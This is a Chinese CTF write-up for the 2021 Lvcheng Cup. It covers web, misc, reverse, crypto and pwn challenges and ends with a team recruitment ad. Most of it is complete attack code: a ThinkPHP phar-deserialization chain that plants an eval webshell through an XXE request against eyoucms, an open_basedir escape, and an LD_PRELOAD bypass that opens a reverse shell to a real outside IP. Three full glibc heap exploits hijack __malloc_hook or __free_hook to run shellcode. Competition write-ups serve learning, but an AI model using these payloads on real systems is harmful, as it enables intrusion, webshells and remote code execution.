2021 绿城杯 wp

Web

ezcms

ciscn 华东北分区赛 AWD 用过的链子(ThinkPHP 反序列化利用链;下面的脚本把这条链以 phar metadata 的形式打包)

<?php
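namespace think\cache\driver {
    // Tail of the gadget chain: ThinkPHP's File cache driver. Its 'path'
    // option is where the driver writes cache files, so pointing it at a
    // php://filter chain turns a cache write into an arbitrary file write.
    // Which driver method performs the write on the target's ThinkPHP version
    // is not shown here — confirm against that version.
    class File
    {
        protected $options = null;
        protected $tag;

        function __construct()
        {
            // The base64 blob decodes to `<?php @eval($_REQUEST['suanve']);?>`,
            // i.e. a one-line webshell dropped into the uploads directory.
            // The iconv utf-8→utf-7 step is the usual trick for neutralising
            // the `exit()` header the driver prepends (verify for this
            // version); the leading `aaa` is presumably base64 alignment
            // padding; `<blob>/../` is consumed as a bogus path component so
            // the real resource path is uploads/.../a.php.
            // The whole URL MUST stay on one line — a line break inside the
            // string literal breaks the wrapper.
            $this->options = [
                'expire'        => 3600,
                'cache_subdir'  => false,
                'prefix'        => '',
                'path'          => 'php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode/resource=aaaPD9waHAgQGV2YWwoJF9SRVFVRVNUWydzdWFudmUnXSk7Pz4g/../uploads/user/4/allimg/20210929/a.php',
                'data_compress' => false,
            ];
            $this->tag = 'suanve';
        }
    }
}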
namespace think\session\driver {
    // Stand-in for the framework's base class so the chain serialises
    // standalone; only the class name matters for unserialize().
    class SessionHandler {}

    // Middle link: carries the File cache driver in $handler.
    class Memcached extends SessionHandler
    {
        protected $handler;
        protected $config = [];

        function __construct()
        {
            // The two config values are arbitrary; only their presence
            // appears to matter (not verified against the framework).
            $this->config = [
                'session_name' => 123,
                'expire'       => 123,
            ];
            $this->handler = new \think\cache\driver\File();
        }
    }
}
namespace think\console {
    // Console Output object whose $handle is the Memcached session driver.
    // NOTE(review): presumably Output's magic __call forwards a method named
    // in $styles ('readAndWrite') on to $handle — confirm in the framework.
    class Output
    {
        protected $styles;
        private $handle;

        function __construct()
        {
            $this->styles = ['readAndWrite'];
            $this->handle = new \think\session\driver\Memcached();
        }
    }
}
namespace think {
    // Head of the chain: the object stored as phar metadata. 'started' plus
    // running=true are the state values that, on destruction, lead the
    // framework's Process into touching $processPipes (the Output object).
    class Process
    {
        private $processInformation;
        private $status;
        private $process;
        private $processPipes;

        function __construct()
        {
            $this->processPipes = new console\Output();
            $this->status = 'started';
            $this->processInformation = ['running' => true];
            $this->process = 1;
        }
    }
}
namespace {
    use think\Process;

    // Build the phar whose manifest metadata is the gadget chain. Phar
    // metadata is unserialize()d as soon as a filesystem function touches
    // the archive through the phar:// wrapper — that is what the XXE below
    // triggers. Building requires phar.readonly=0 in the local php.ini.
    @unlink("phar.phar");
    $phar = new Phar("phar.phar");   // Phar insists on the .phar suffix at build time
    $phar->startBuffering();
    // The GIF89a prefix lets the file pass a magic-byte check once renamed.
    $phar->setStub('GIF89a' . '<?php __HALT_COMPILER();?>');
    $phar->setMetadata(new Process());             // chain goes into the manifest
    $phar->addFromString("test.txt", "test");      // any one file makes the archive valid
    $phar->stopBuffering();                        // signature is computed here
    // Copy out under an innocuous extension; the writeup renames it to .ico.
    copy("./phar.phar", "/Users/su/1.gif");
}

生成 phar 文件。eyoucms 对 .ico 后缀的上传只检查后缀、不检查内容,所以把 phar 改名为 .ico 即可上传;`phar://` 包装器在任何文件系统函数访问归档时都会对 manifest 里的 metadata 做 unserialize,与扩展名无关,因此通过 XXE 读取 `phar://...ico` 就能触发这条反序列化链。通过 gitee 上的一次 XXE 修复提交定位到了存在 XXE 的入口(下面请求里的 `/index.php/home/Index/_initialize`),应该可以利用。

POST /index.php/home/Index/_initialize HTTP/1.1
Host: 0666787d-4b66-4e6e-8d13-55ab438b085f.zzctf.dasctf.com
Content-Type: text/xml; charset=utf-8
Cache-Control: max-age=0
Content-Length: 265
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=phar:///var/www/html/uploads/user/4/allimg/20210929/4-210929141155239.ico" >]>
<root>
<name>&xxe;</name>
</root>

拿到shell发现限制
绕过openbasedir
然后用 LD_PRELOAD 绕过 disable_functions 并反弹 shell。注意下面的脚本并没有用 `dl()`:它用 putenv 设置 `LD_PRELOAD=/tmp/exp.so`,再调用 `mb_send_mail()` 拉起 sendmail 子进程,由预先上传到 /tmp 的 exp.so 执行环境变量 `EVIL_CMDLINE` 里的命令(exp.so 的内容本文未给出)。

<?php
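// --- open_basedir escape ---------------------------------------------------
// The well-known chdir('..') trick: open_basedir can only be narrowed at
// runtime, but a relative value ('..') is resolved against the *current*
// directory, which we keep moving up with chdir('..'). The number of
// chdir('..') calls has to reach '/' from this script's directory (four
// matched the target's upload depth; adjust otherwise), after which '/' sticks.
ini_set('open_basedir', dirname(__FILE__));
mkdir('tmp');
chdir('tmp');
ini_set('open_basedir', '..');
chdir('..');
chdir('..');
chdir('..');
chdir('..');
ini_set('open_basedir', '/');
echo "fuck runing";

// --- disable_functions bypass via LD_PRELOAD -------------------------------
// mb_send_mail() spawns the sendmail binary; that child inherits LD_PRELOAD
// and loads /tmp/exp.so, which must already have been uploaded and is
// expected to run the command in EVIL_CMDLINE (exp.so is not shown here).
// The base64 decodes to:  bash -i >& /dev/tcp/121.196.165.115/901 0>&1
// (a reverse shell; for a one-shot, non-interactive check use e.g. '/readflag').
$cmd = "echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjEuMTk2LjE2NS4xMTUvOTAxIDA+JjE=|base64 -d |bash";
$out_path = "/tmp/xxx";
$evil_cmdline = $cmd . " > " . $out_path . " 2>&1";
echo "<p> <b>cmdline</b>: " . $evil_cmdline . "</p>";
putenv("EVIL_CMDLINE=" . $evil_cmdline);
$so_path = "/tmp/exp.so";
putenv("LD_PRELOAD=" . $so_path);
mb_send_mail("", "", "");
// Only useful for commands that terminate: with the reverse shell above the
// output file stays empty until the session ends.
echo "<p> <b>output</b>: <br />" . nl2br(file_get_contents($out_path)) . "</p>";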

使用 PATH 提权

ezphp

githack获取源码
FLAG DASCTF{ca9efc658d3d96d7f2ccc81733bb4830}

Misc

[warmup]⾳频隐写

使用 Audacity 打开题目音频,切换到频谱图视图,拉到最后即可看到 flag。

Re

easyre

32 位 exe 文件,打开之后是魔改的 RC4
直接写逆向脚本不好做。从下面脚本可见,只要某个输入前缀使程序的输出不同于固定的"拒绝"输出,就说明该前缀正确,因此可以逐位爆破:用 Python 把候选输入喂给 exe,再比较输出是否变化。

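import subprocess

# Exact stdout lines easy_re.exe prints for a rejected input. Any different
# output means the current prefix is accepted and the next char can be searched.
REJECT_OUTPUT = ['Hello, this is my world.If you want flag, give me something I like.\n', '\n', '\n', '\n',
                 "sorry!I don't like your stuff."]
BINARY = "easy_re.exe"
MAX_LEN = 50   # upper bound on the flag length; the search stops early anyway


def run_binary(candidate, binary=BINARY):
    """Feed *candidate* to the binary on stdin and return its stdout lines.

    Uses explicit file handles instead of a shell command line, so the
    candidate never has to pass through shell parsing.
    """
    with open("tt.txt", "w") as f:
        f.write(candidate)
    with open("tt.txt", "r") as stdin, open("flag.txt", "w") as stdout:
        subprocess.call([binary], stdin=stdin, stdout=stdout)
    with open("flag.txt", "r") as a:
        return a.readlines()


def recover(oracle, reject_output, max_len=MAX_LEN, charset=range(32, 127)):
    """Recover the accepted input one character at a time.

    oracle(candidate) returns the program's output lines; anything other than
    *reject_output* means *candidate* is a correct prefix. Characters are tried
    in *charset* order (printable ASCII by default). Stops as soon as no
    character extends the prefix — either the whole input was found or
    *reject_output* does not match the program — and returns the prefix.
    """
    found = ""
    for _ in range(max_len):
        for code in charset:
            candidate = found + chr(code)
            if oracle(candidate) != reject_output:
                print(chr(code))
                found = candidate
                break
        else:
            break   # no char accepted: done (original looped on uselessly here)
    return found


if __name__ == "__main__":
    print(recover(run_binary, REJECT_OUTPUT))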

FLAG flag{c5e0f5f6-f79e-5b9b-988f-28f046117802}

Crypto

RSA1


[warmup]加密算法

加密算法是仿射密码:取字母在表中的下标 i,按 (i*a+b)%m 算出新下标作为密文字符(这里 a=37, b=23, m=52,表为大小写共 52 个字母,表外字符原样保留)。因为 gcd(37,52)=1,这个映射可逆,只需写一个逆操作即可(脚本里直接枚举所有下标找满足等式的那个)。

from Crypto.Util.number import *
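cipher_text = 'aoxL{XaaHKP_tHgwpc_hN_ToXnnht}'
str1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'


def decode(plain_text, a, b, m):
    """Invert the affine map  i -> (i*a + b) % m  over the alphabet str1.

    plain_text is (despite its name) the ciphertext. For every character the
    alphabet indices i with (i*a + b) % m == index-of-char are emitted in
    order — exactly one when gcd(a, m) == 1 and m == len(str1), as for the
    key 37/23/52 below. Characters outside str1 pass through unchanged.
    Prints the result (as the original did) and also returns it.
    """
    alphabet_len = len(str1)
    pieces = []
    for ch in plain_text:
        target = str1.find(ch)   # -1 for chars outside the alphabet: never matches
        pieces.extend(str1[i] for i in range(alphabet_len) if (i * a + b) % m == target)
        if ch not in str1:
            pieces.append(ch)
    flag = ''.join(pieces)
    print(flag)
    return flag


if __name__ == "__main__":
    decode(cipher_text, 37, 23, 52)
    # flag{AffInE_CIpheR_iS_clAssiC}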

Pwn

null_pwn

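#coding:utf-8
"""null_pwn exploit (64-bit, glibc 2.23).

Sequence, as far as the calls below show it:
  1. free chunk 0 (0x90 -> unsorted bin) and show it;
  2. through chunk 3, set chunk 4's prev_size to 0x200 (the distance back to
     chunk 0) and zero the low byte of its size (clears PREV_INUSE), so
     freeing chunk 4 consolidates backwards over chunks 0..3;
  3. re-allocate chunk 0 as 0xd0 so it overlaps chunk 1's header; only the
     fd is overwritten, so show(0) leaks the bk left over from the bin the
     merged chunk sat in (main_arena + 840; main_arena is 0x10 past
     __malloc_hook in this build, hence "- 840 - 0x10");
  4. poison the 0x70 fastbin fd of chunk 1 with the classic fake chunk at
     __malloc_hook - 0x23 (a 0x7f byte of a libc pointer doubles as its
     size field), allocate it and write a one_gadget into __malloc_hook;
  5. corrupt chunk 1's size to 0x1000 and free it: glibc 2.23's error path
     ends up calling malloc, which fires the hook.
All magic constants (840, -0x23, one_gadget offsets) are specific to this
libc build; recompute them for any other libc. Python 2 / pwntools idioms.
"""
import sys
from pwn import *
from ctypes import CDLL

context.log_level = 'debug'
elfelf = './null_pwn'
LIBC_PATH = '/lib/x86_64-linux-gnu/libc-2.23.so'
# one_gadget offsets for this libc build; index 2 (0xf03a4) is the one used
one_gadget = [0x45226, 0x4527a, 0xf03a4, 0xf1247]

# Runs again if interactive() returns (e.g. on EOF); the try/except that made
# this a real retry loop in the original template is commented out.
while True:
    elf = ELF(elfelf)
    context.arch = elf.arch
    gdb_text = '''
    telescope $rebase(0x202040) 16
    '''
    if len(sys.argv) == 1:
        io = process(elfelf)
    else:
        io = remote('82.157.5.28', 51704)
    libc = ELF(LIBC_PATH)

    # Menu wrappers; prompts are matched verbatim against the binary's output.
    def choice(a):
        io.sendlineafter('Your choice :', str(a))

    def add(a, c, b):
        choice(1)
        io.sendlineafter('Index:', str(a))
        io.sendlineafter('Size of Heap : ', str(c))
        io.sendafter('Content?:', b)

    def edit(a, b):
        choice(3)
        io.sendlineafter('Index:', str(a))
        io.sendafter('Content?:', b)

    def show(a):
        choice(4)
        io.sendlineafter('Index :', str(a))

    def delete(a):
        choice(2)
        io.sendlineafter('Index:', str(a))

    add(0, 0x88, 'a')
    add(1, 0x68, 'a')
    add(2, 0x68, 'a')
    add(3, 0x88, 'a')
    add(4, 0xf0, 'a')
    add(5, 0xf0, 'a')   # presumably a guard so chunk 4 never merges with top

    delete(0)           # chunk 0 -> unsorted bin
    show(0)
    # chunk 3 user data + 0x80 is chunk 4's prev_size; the trailing NUL is the
    # low byte of chunk 4's size (0x101 -> 0x100, PREV_INUSE cleared).
    edit(3, '\x00' * 0x80 + p64(0x200) + '\x00')
    delete(4)           # backward consolidation: one big free chunk from chunk 0
    delete(1)           # chunk 1 -> 0x70 fastbin (still inside the big chunk)

    add(0, 0xc8, 'a' * 8)   # overwrites fd only; bk keeps the bin pointer
    show(0)
    libc_base = u64(io.recvuntil('\x7f')[-6:] + '\x00\x00') - libc.sym['__malloc_hook'] - 840 - 0x10
    libc.address = libc_base

    # chunk 0 user data + 0x88 is chunk 1's size field, + 0x90 its fastbin fd.
    edit(0, '\x00' * 0x88 + p64(0x71) + p64(libc.sym['__malloc_hook'] - 0x23) + '\n')
    add(1, 0x68, 'a')   # takes chunk 1 back out of the fastbin
    add(3, 0x68, 'a')   # takes the fake chunk at __malloc_hook - 0x23
    # fake chunk data starts at __malloc_hook - 0x13 -> 0x13 bytes of padding
    edit(3, '\x00' * 0x13 + p64(libc_base + one_gadget[2]) + '\n')

    # Bogus size + free -> malloc_printerr path -> malloc -> __malloc_hook.
    edit(0, '\x00' * 0x88 + p64(0x1000) + p64(libc.sym['__malloc_hook'] - 0x23) + '\n')
    delete(1)
    success('libc_base:' + hex(libc_base))
    # gdb.attach(io, gdb_text)
    io.interactive()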

uaf

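#coding:utf-8
"""uaf_pwn exploit (64-bit, glibc 2.23).

The binary lets a freed note be shown and edited (use after free), so:
  1. free chunk 0 (0x90 -> unsorted bin) and show it: its bk is
     main_arena + 88, and main_arena is 0x10 past __malloc_hook, hence the
     "- 88 - 0x10";
  2. free chunk 1 (0x70 fastbin) and edit its fd to the classic fake chunk at
     __malloc_hook - 0x23 (a 0x7f byte of a libc pointer doubles as its size);
  3. two allocations return chunk 1 and then the fake chunk; 0x13 bytes of
     padding put the one_gadget exactly on __malloc_hook;
  4. double free of chunk 1: glibc 2.23's "double free or corruption" error
     path ends up calling malloc, which fires the hook.
Note indices are assumed to be handed out sequentially (the two new notes
become 3 and 4). one_gadget offsets are for this libc build only.
Python 2 / pwntools idioms.
"""
import sys
from pwn import *
from ctypes import CDLL

context.log_level = 'debug'
elfelf = './uaf_pwn'
LIBC_PATH = '/lib/x86_64-linux-gnu/libc-2.23.so'
one_gadget = [0x45226, 0x4527a, 0xf03a4, 0xf1247]   # index 2 is the one used

# Runs again if interactive() returns; the retry try/except is commented out.
while True:
    elf = ELF(elfelf)
    context.arch = elf.arch
    gdb_text = '''
    telescope $rebase(0x202040) 16
    '''
    if len(sys.argv) == 1:
        io = process(elfelf)
    else:
        io = remote('82.157.5.28', 50202)
    libc = ELF(LIBC_PATH)

    def choice(a):
        io.sendlineafter('>', str(a))

    def add(c):
        choice(1)
        io.sendafter('size>', str(c))

    def edit(a, b):
        choice(3)
        io.sendlineafter('index>', str(a))
        io.sendafter('content>', b)

    def show(a):
        choice(4)
        io.sendlineafter('index>', str(a))

    def delete(a):
        choice(2)
        io.sendlineafter('index>', str(a))

    # The binary prints a heap address at start-up; consumed but not needed.
    io.recvuntil('0x')
    heap_addr = int(io.recv(12), 16)

    add(0x88)   # 0
    add(0x68)   # 1
    add(0x68)   # 2 (presumably a guard between chunk 1 and top)
    delete(0)
    show(0)
    libc_base = u64(io.recvuntil('\x7f')[-6:] + '\x00\x00') - libc.sym['__malloc_hook'] - 88 - 0x10
    libc.address = libc_base

    delete(1)                                           # chunk 1 -> 0x70 fastbin
    edit(1, p64(libc.sym['__malloc_hook'] - 0x23))     # UAF write: poison its fd
    add(0x68)   # 3: chunk 1 again
    add(0x68)   # 4: the fake chunk at __malloc_hook - 0x23
    edit(4, '\x00' * 0x13 + p64(one_gadget[2] + libc_base))   # __malloc_hook = one_gadget
    delete(1)
    delete(1)   # fastbin double free -> error path -> malloc -> hook
    success('libc_base:' + hex(libc_base))
    # gdb.attach(io, gdb_text)
    io.interactive()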

GreentownNote

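#coding:utf-8
"""GreentownNote exploit (64-bit, glibc 2.27).

  1. free chunk 1 seven times to fill the 0x90 tcache bin (2.27 has no
     tcache double-free check), then free chunk 0: it goes to the unsorted
     bin and show(0) leaks main_arena + 96 (main_arena is 0x10 past
     __malloc_hook, hence "- 96 - 0x10");
  2. chunk 1 heads the tcache list and its next pointer is chunk 1 itself;
     writing &__free_hook into it makes __free_hook the list's next entry,
     so the third allocation returns __free_hook itself;
  3. that allocation writes: [__free_hook] = setcontext+53, [+8] = return
     address (free_hook + 0x10), [+0x10] = a first-stage shellcode;
  4. a 0x200 chunk holds a SigreturnFrame; freeing it calls
     __free_hook(chunk) = setcontext+53(frame), which loads
     rip = mprotect(page, 0x1000, rwx) and rsp = free_hook + 8, so mprotect
     returns straight into the first stage;
  5. stage one read()s stage two from stdin into the now-executable page and
     jumps to it; stage two open()s "./flag", read()s it and write()s it to
     stdout.
Assumes the glibc 2.27 setcontext+53 register layout; check it and the
libc path against the target's libc. Python 2 / pwntools idioms
(str(frame) — use bytes() under Python 3).
"""
import sys
from pwn import *
from ctypes import CDLL

context.log_level = 'debug'
elfelf = './GreentownNote'

# Runs again if interactive() returns; the retry try/except is commented out.
while True:
    elf = ELF(elfelf)
    context.arch = elf.arch
    gdb_text = '''
    telescope $rebase(0x202040) 16
    '''
    if len(sys.argv) == 1:
        io = process(elfelf)
        libc = ELF('/glibc/x64/2.27/lib/libc-2.27.so')
    else:
        io = remote('82.157.5.28', 51701)
        libc = ELF('./libc-2.27.so')   # the challenge's libc; local path above must match its build

    def choice(a):
        io.sendlineafter('Your choice :', str(a))

    def add(b, c):
        choice(1)
        io.sendlineafter(':', str(b))
        io.sendafter(':', str(c))

    def show(a):
        choice(2)
        io.sendlineafter(':', str(a))

    def delete(a):
        choice(3)
        io.sendlineafter(':', str(a))

    add(0x88, 'a')   # 0
    add(0x88, 'a')   # 1
    for i in range(7):
        delete(1)    # fill tcache[0x90] with chunk 1
    delete(0)        # tcache full -> unsorted bin
    show(0)
    libc_base = u64(io.recvuntil('\x7f')[-6:] + '\x00\x00') - libc.sym['__malloc_hook'] - 96 - 0x10
    libc.address = libc_base
    free_hook_addr = libc.sym['__free_hook']
    success('libc_base:' + hex(libc_base))

    # tcache poisoning through the self-linked chunk 1: the next add of 0x88
    # after these two returns __free_hook itself.
    add(0x88, p64(free_hook_addr))
    add(0x88, p64(free_hook_addr))

    # Page-aligned target for stage two (mprotect needs page alignment).
    new_shell_code_head_addr = free_hook_addr & 0xfffffffffffff000
    # stage one: read(0, page, 0x1000); jmp page
    shell1 = '''
    xor rdi,rdi
    mov rsi,%d
    mov rdx,0x1000
    xor rax,rax
    syscall
    jmp rsi
    ''' % new_shell_code_head_addr
    pay = p64(libc.sym['setcontext'] + 53) + p64(free_hook_addr + 0x10) + asm(shell1)
    add(0x88, pay)   # 2: lands on __free_hook

    srop_mprotect = SigreturnFrame()
    srop_mprotect.rsp = free_hook_addr + 0x8      # mprotect's return address -> stage one
    srop_mprotect.rdi = new_shell_code_head_addr
    srop_mprotect.rsi = 0x1000
    srop_mprotect.rdx = 4 | 2 | 1                  # PROT_READ | PROT_WRITE | PROT_EXEC
    srop_mprotect.rip = libc.sym['mprotect']
    add(0x200, str(srop_mprotect))   # 3: the frame
    # gdb.attach(io, gdb_text)
    delete(3)   # free(frame) -> __free_hook(frame) = setcontext+53

    # stage two: open("./flag"), read it onto the stack, write it to stdout.
    # 0x67616c662f2e is "./flag" little-endian, NUL-terminated by the high bytes.
    shell2 = '''
    mov rax,0x67616c662f2e
    push rax
    mov rdi,rsp
    mov rsi,0x0
    xor rdx,rdx
    mov rax,0x2
    syscall
    mov rdi,rax
    mov rsi,rsp
    mov rdx,0x100
    mov rax,0x0
    syscall
    mov rdi,0x1
    mov rsi,rsp
    mov rdx,0x100
    mov rax,0x1
    syscall
    '''
    io.sendline(asm(shell2))
    io.interactive()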

Tip

你是否想加入一个安全团

拥有更好的学习住宅?

那就加入EDI安全,一起来不是,但师傅们明白,可以让你从基础开始,只要你有恒努力的决心

EDI安全的CTF战队经常参与CTF比赛,了解CTF赛事,在为打造安全圈好的技术我们自己而努力,这里绝对是你学习的好技术。 ,可以让你一起从基础开始,只要你有持之以恒努力的决心,下一个CTF大牛就是你。

欢迎大佬小白入驻,大家一起打CTF,一起进步。

我们在,不让你埋没!

你的加入可以给我们带来新的活力,我们同样也可以给予你无限的发展空间。

有意向的师傅请联系邮箱root@edisec.net带上自己的简历,简历内容包括自己的学习、学习方向等
